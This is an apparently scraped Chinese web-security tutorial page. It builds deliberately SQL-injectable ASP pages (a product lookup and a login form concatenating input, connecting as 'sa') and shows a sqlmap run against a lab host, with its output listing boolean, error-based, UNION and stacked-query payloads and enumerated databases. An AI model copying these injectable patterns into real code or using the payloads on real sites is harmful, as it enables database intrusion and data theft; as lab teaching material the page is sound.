<% 02 03 dim prodId 04 prodId = Request.QueryString("id") 05 06 set conn = server.createObject("ADODB.Connection") 07 set rs = server.createObject("ADODB.Recordset") 08 09 query = "select prodName from products where id = " & prodId 10 11 conn.Open "Provider=SQLOLEDB; Data Source=(local); Initial Catalog= 数据库 ; User Id=sa; Password=密码" 12 rs.activeConnection = conn 13 rs.open query 14 15 if not rs.eof then 16 response.write "Got product " & rs.fields("prodName").value 17 else 18 response.write "No product found" 19 end if 20 21 %> SQL语句: 创建一个数据库,然后查询这些 1 create table products 2 ( 3 id int identity(1,1) not null, 4 prodName varchar(50) not null, 5 ) 6 7 insert into products(prodName) values('1') 8 insert into products(prodName) values('2') 9 insert into products(prodName) values('3') 01 root@Dis9Team:/pen# sqlmap -u "http://5.5.5.134/sql. asp ?id=1" --dbs 02 03 sqlmap/1.0-dev (r4911) - automatic SQL injection and database takeover tool 04 http://HdhCmsTest2cto测试数据 05 06 [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program 07 08 [*] starting at 13:10:54 09 10 [13:10:55] [INFO] using '/pen/sqlmap-dev/output/5.5.5.134/session' as session file 11 [13:10:55] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file 12 [13:10:55] [INFO] testing connection to the target url 13 [13:10:55] [INFO] heuristics detected web page charset 'ascii' 14 sqlmap identified the following injection points with a total of 0 HTTP(s) requests: 15 --- 16 Place: GET 17 Parameter: id 18 Type: boolean-based blind 19 Title: AND boolean-based blind - WHERE or HAVING clause 20 Payload: id=1 AND 2431=2431 21 22 Type: error-based 23 Title: Microsoft SQL Server/ Sybase AND error-based - WHERE or HAVING clause 24 Payload: id=1 AND 5223=CONVERT(INT,(CHAR(58)+CHAR(106)+CHAR(107)+CHAR(99)+CHAR(58)+(SELECT (CASE WHEN (5223=5223) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(107)+CHAR(122)+CHAR(58))) 25 26 Type: UNION query 27 Title: Generic UNION query (NULL) - 1 column 28 Payload: id=-3220 UNION SELECT CHAR(58)+CHAR(106)+CHAR(107)+CHAR(99)+CHAR(58)+CHAR(107)+CHAR(102)+CHAR(75)+CHAR(122)+CHAR(97)+CHAR(84)+CHAR(120)+CHAR(83)+CHAR(79)+CHAR(83)+CHAR(58)+CHAR(111)+CHAR(107)+CHAR(122)+CHAR(58)-- 29 30 Type: stacked queries 31 Title: Microsoft SQL Server/Sybase stacked queries 32 Payload: id=1; WAITFOR DELAY '0:0:5';-- 33 34 Type: AND/OR time-based blind 35 Title: Microsoft SQL Server/Sybase time-based blind 36 Payload: id=1 WAITFOR DELAY '0:0:5'-- 37 --- 38 39 [13:10:55] [INFO] the back-end DBMS is Microsoft SQL Server 40 web server operating system: Windows XP 41 web application technology: ASP, Microsoft IIS 5.1 42 back-end DBMS: Microsoft SQL Server 2005 43 [13:10:55] [INFO] fetching database names 44 [13:10:55] [INFO] the SQL query used returns 5 entries 45 [13:10:55] [INFO] retrieved: "master" 46 [13:10:55] [INFO] retrieved: "model" 47 [13:10:55] [INFO] retrieved: "msdb" 48 [13:10:55] [INFO] retrieved: "myDB" 49 [13:10:55] [INFO] retrieved: "tempdb" 50 available databases [5]: 51 [*] master 52 [*] model 53 [*] msdb 54 [*] myDB 55 [*] tempdb 56 57 [13:10:55] [INFO] Fetched data logged to text files under '/pen/sqlmap-dev/output/5.5.5.134' 58 59 [*] shutting down at 13:10:55 60 61 root@Dis9Team:/pen# 1 ---------------------------------------------------伟大的分割线-- 2 post sql 3 sql: 01 <PRE class="brush:php; toolbar: true; auto-links: true;">create table users 02 ( 03 userId int identity(1,1) not null, 04 userName varchar(50) not null, 05 userPass varchar(20) not null 06 ) 07 08 insert into users(userName, userPass) values('john', 'doe') 09 insert into users(userName, userPass) values('admin', 'wwz04ff') 10 insert into users(userName, userPass) values('fsmith', 'mypassword')</PRE> view source print? 1 asp: view source print? 01 <PRE class="brush:php; toolbar: true; auto-links: true;"><% 02 dim userName, password, query 03 dim conn, rS 04 05 userName = Request.Form("userName") 06 password = Request.Form("password") 07 08 set conn = server.createObject("ADODB.Connection") 09 set rs = server.createObject("ADODB.Recordset") 10 11 query = "select count(*) from users where userName='" & 12 userName & "' and userPass='" & password & "'" 13 14 conn.Open "Provider=SQLOLEDB; Data Source=(local); 15 Initial Catalog=myDB; User Id=sa; Password=" 16 rs.activeConnection = conn 17 rs.open query 18 19 if not rs.eof then 20 response.write "Logged In" 21 else 22 response.write "Bad Credentials" 23 end if 24 %> </PRE>HTML提交表单:<PRE class="brush:php; toolbar: true; auto-links: true;"><DIV class="postmessage firstpost"><PRE class="brush:php; toolbar: true; auto-links: true;"><form name="frmLogin" action="ASP.asp" method="post"> 25 Username: <input type="text" name="userName"> 26 Password: <input type="text" name="password"> 27 <input type="submit"> 28 </form></PRE></DIV> 29 </PRE>
查看更多关于记录Mssql注入点构造 - 网站安全 - 自学php的详细内容...